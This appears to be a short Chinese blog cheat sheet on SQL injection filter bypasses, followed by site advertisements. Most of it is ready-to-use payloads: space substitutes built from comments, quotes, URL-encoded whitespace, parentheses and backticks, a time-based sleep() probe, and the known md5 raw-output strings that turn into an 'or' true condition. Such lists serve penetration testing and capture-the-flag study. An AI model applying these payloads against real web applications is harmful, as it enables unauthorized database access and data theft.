SQL注入绕过
空格绕过
1.利用注释绕过
如:id=1/**/and/**/1=1/**/#
2.利用引号绕过
如id='1'and'1'='2'
3.利用 %09、%0a、%0b、%0c、%0d 绕过
将空格替换即可 如:id='1'%09union%09select%081,2,3 #
4.利用括号绕过
如:
id='1'and(1=1)
id='1'union select(database()),('1')注:union select中间无法使用括号绕过
id='1'and(if(1=1,sleep(2),1))
5.利用"`" 绕过
如:select`name`from`user`
md5绕过
当mysql中md5第二个参数为True时
以原始 16 字符二进制格式。
因此,输入ffifdyop或129581926211651571912466741651878684928进行md5加密后先当于'or'6或'or true
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 分享4款.NET开源、免费、实用的商城系统
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· 记一次.NET内存居高不下排查解决与启示